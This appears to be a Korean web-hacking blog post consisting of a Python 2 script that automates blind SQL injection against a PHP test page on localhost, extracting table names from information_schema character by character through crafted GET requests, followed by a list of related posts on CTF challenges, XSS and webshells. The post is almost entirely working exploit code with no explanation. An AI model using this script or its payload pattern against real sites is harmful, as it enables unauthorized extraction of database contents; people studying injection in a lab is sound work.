#python
from socket import *
import sys
import struct
IP = "127.0.0.1"
PORT = 80
STD_STR = "1 a"
def MakePacket(UNIT,NUM,RAW=0):
HEADER = "GET /mysql_test.php?id=1%26%26hex(mid((select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a1,1),"+str(UNIT)+",1))="
FOOTER = " HTTP/1.0\r\n\r\n"
SEND_PACKET = HEADER + str(NUM) + FOOTER
return SEND_PACKET
def SendPacket(UNIT, NUM):
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((IP,PORT))
_sendData = MakePacket(UNIT,NUM)
sock.send(_sendData)
data=sock.recv(10240)
return data
def main():
RESULT=''
for i in range (1,20):
for j in range (30,128):
RES = SendPacket(i,j)
if RES.find(STD_STR) > 0 :
RESULT = RESULT + str(j)
print RESULT.decode("hex")
if __name__== "__main__" :
main()
'Web_Hacking' 카테고리의 다른 글
| [white hacking] 화이트 해킹대회 web PPPPAAAASSSWWW... (150Point) (0) | 2013.09.15 |
|---|---|
| [White Hacking] Serial2 web(150 point) Write-up (0) | 2013.09.15 |
| 크로스 사이트 스크립트 치트시트 (XSS Cheat sheet) (0) | 2013.01.23 |
| 웹쉘 에사용되는 함수 점검하는 스크립트~ (Script, Finding using function in webshell) (0) | 2012.11.29 |
| Zeroboard XE 1.5.3.3 admin 페이지의 webshell 인젝션 취약점 (0) | 2012.11.26 |
